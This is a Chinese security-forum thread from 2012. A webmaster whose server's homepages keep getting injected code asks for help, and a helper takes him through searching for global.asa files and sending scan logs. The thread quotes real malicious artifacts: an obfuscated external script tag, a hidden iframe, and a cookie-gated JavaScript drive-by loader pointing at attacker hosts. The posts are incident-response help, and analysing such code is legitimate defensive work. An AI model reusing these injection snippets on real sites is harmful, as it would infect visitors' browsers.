瑞星卡卡安全论坛
ying8125 - 2012-7-6 11:09:00
:kaka4:网页顶部代码无法删除,急!!!
网站首页顶部总是有病毒代码.已经用了很多方法清除,如:恶意代码清除器,强力杀等,查杀同时把疑是病毒的带he1p.asp后缀的连文件夹都删了
但现在从浏览器里一打开首页还是有.目前软件查杀已经杀不出病毒了。从网页源代码里看也是干净的.怎么能把那段代码去掉.尽量不想重做服务器.:kaka4:
望各位大侠给支支招!!
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)附件:
ts.jpg
networkedition - 2012-7-6 11:13:00
那段代码,在网站服务器上,网站页面文件里清除了,还会生成?
网站地址是什么?
ying8125 - 2012-7-6 11:13:00
网页顶部代码无法删除,急!!!
网站首页顶部总是有病毒代码.已经用了很多方法清除,如:恶意代码清除器,强力杀等,查杀同时把疑是病毒的带he1p.asp后缀的连文件夹都删了
但现在从浏览器里一打开首页还是有.目前软件查杀已经杀不出病毒了。从网页源代码里看也是干净的.怎么能把那段代码去掉.尽量不想重做服务器.
望各位大侠给支支招!!
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)
ying8125 - 2012-7-6 11:20:00
是的.用杀毒软件断网查杀了好几次,已经杀不出毒来了.
网页代码我也都检查过了,是干净的.
但就是首页顶部一直有那段代码,去不掉.从网页里看不到这段,只是从浏览器打开就有.
网址是
http://www.ineast.com
networkedition - 2012-7-6 11:27:00
服务器是托管的啊?装个arp防火墙试试。
ying8125 - 2012-7-6 11:29:00
是我们公司自己的服务器.
装的360,上面有ARP的防护.但是一直有.主要是想把这段代码赶紧去掉.或是找出源头.
我的QQ号:79978070,您可以加我.
天才小菜鸟1 - 2012-7-7 9:35:00
黑客加的代码吧 或许是后门 - -噗
networkedition - 2012-7-9 9:28:00
在网站服务器上全盘搜索global.asa这个文件,如果有压缩发来。搜索时再更多高级选项里勾选搜索隐藏的文件和文件夹。
ying8125 - 2012-7-9 10:43:00
急!!
我们的服务器是WIN2003的,最近所有的网站首页顶部都被代入一段代码,从源文件里看不到,无法删除,360杀毒也杀不出来什么,用了其他的一些工具也不行.请问有没有高手能帮忙解决@@急!!代码如下:
<script language=javascript src=http://f%70r.A%74Her%53ite.c%6Fm/b.js?google=7x011></script>与此同时发现系统文件夹里有一个CryptWan.dll文件夹是病毒吗 ,删除或是打开这个文件都不行,提示拒绝访问.
还用UNLOCKER和恶意代码清除器分别尝试了,也没有作用.
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)
networkedition - 2012-7-9 10:53:00
将CryptWan.dll压缩跟帖上传。
networkedition - 2012-7-9 10:57:00
ying8125 - 2012-7-9 11:07:00
CryptWan.dll,不能压缩,报一个:不能读取 C:\WINDOWS\system32\CryptWan.dll\* 的内容
打开的话就报拒绝访问。
现在正在全盘搜索:global.asa这个文件
ying8125 - 2012-7-9 11:14:00
正在扫描日志,先把搜到的global.asa文件发上来
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)附件:
global扫描结果.rar
ying8125 - 2012-7-9 11:15:00
ying8125 - 2012-7-9 11:33:00
现将扫描好的日志发上来,您给看看.
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)附件:
SREngLOG.log
ying8125 - 2012-7-9 11:35:00
networkedition - 2012-7-9 12:54:00
c:\documents and settings\all users\application data\nul.bcdatax.img 找到压缩发来。
另wbwchat目录下的global.asa文件有问题,都会链接到:<iframe src=http://aaa.369678.cn/bumian12.htm width=50 height=1></iframe>,虽然已失效,查看一下,如果不是网站的正常文件,建议删除。
ying8125 - 2012-7-9 13:54:00
nul.bcdatax.img,这个文件拷不出来,也是删不了,一拷就报:参数不正确.
wbwchat下面的.asa文件都删了.
ying8125 - 2012-7-9 13:56:00
nul.bcdatax.img这个文件能删掉吗?:kaka2:
networkedition - 2012-7-9 14:02:00
已加QQ,请尽快通过验证。
ying8125 - 2012-7-10 14:58:00
网站首页总被挂马,这是从挂马的网址里提取的,能不能帮着分析一下,看能不能在服务器上把这个病毒文件找出来删掉以!!跪求!!
function baiduuu(){
var Then = new Date()
Then.setTime(Then.getTime() + 12*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookvie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{
var xinsi="yztq";
var fire="<ifra"+"me sr";
document.cookie = "Cookvie1=mikaila;expires="+ Then.toGMTString()
document.write("<div style=\'dispaly:none;\' >");
document.write(fire+"c=http:\/\/vni.Jkub.com:89\/2\/niay.htm wid"+"th=100 hei"+"ght=0><\/ifr"+"ame>");
document.write("</div>");
}
}baiduuu();
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2012-7-10 15:05:00
这是通过判断cookie来进行挂马操作啊,并不能通过这段代码找到相应的病毒文件。
ying8125 - 2012-7-10 15:23:00
我该怎么在服务器上查找这段代码?清缓存和COOKIE?
您有没有好用的工具可以给推荐一下?谢谢
networkedition - 2012-7-10 15:33:00
主要是针对客户端的啊:kaka6:
ying8125 - 2012-7-10 15:34:00
您是说这个代码不在服务器上?
ying8125 - 2012-7-10 15:34:00
要不您加我一下QQ
ying8125 - 2012-7-10 15:35:00
我QQ:79978070
newcenturymoon - 2012-7-10 21:45:00
挂的网页代码应该是 利用暴雷漏洞的
1
© 2000 - 2024 Rising Corp. Ltd.